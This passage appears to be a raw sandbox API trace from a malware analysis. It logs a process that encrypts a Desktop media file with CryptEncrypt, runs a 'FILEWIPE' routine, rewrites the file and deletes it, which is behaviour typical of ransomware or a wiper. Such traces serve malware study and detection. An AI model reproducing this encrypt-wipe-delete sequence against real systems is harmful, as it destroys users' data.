[0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0029.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.969] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.970] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.971] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xf8a1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xf8b0) returned 1 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0029.971] CharLowerBuffW (in: lpsz="byte[63665]", cchLength=0xb | out: lpsz="byte[63665]") returned 0xb [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.972] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.973] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8de9d0*, pdwDataLen=0x6ae220*=0xf8a1, dwBufLen=0xf8b0 | out: pbData=0x8de9d0*, pdwDataLen=0x6ae220*=0xf8b0) returned 1 [0029.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.973] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.973] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.978] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.978] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.978] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0029.978] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.978] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.979] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.979] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.979] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0029.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.979] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.983] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x6e9dfc40, ftLastWriteTime.dwHighDateTime=0x1d5b999, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 0x7c2240 [0029.983] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.983] CharLowerBuffW (in: lpsz="byte[63649]", cchLength=0xb | out: lpsz="byte[63649]") returned 0xb [0029.984] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.984] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.984] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.984] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.985] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.985] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.985] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hnsu4w.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0029.986] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.987] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.987] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.988] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.988] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.989] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.989] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.989] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", lpFilePart=0x0) returned 0x30 [0029.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x11c15160, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 0x7c2240 [0029.990] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hnsu4w.mkv")) returned 1 [0029.991] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, 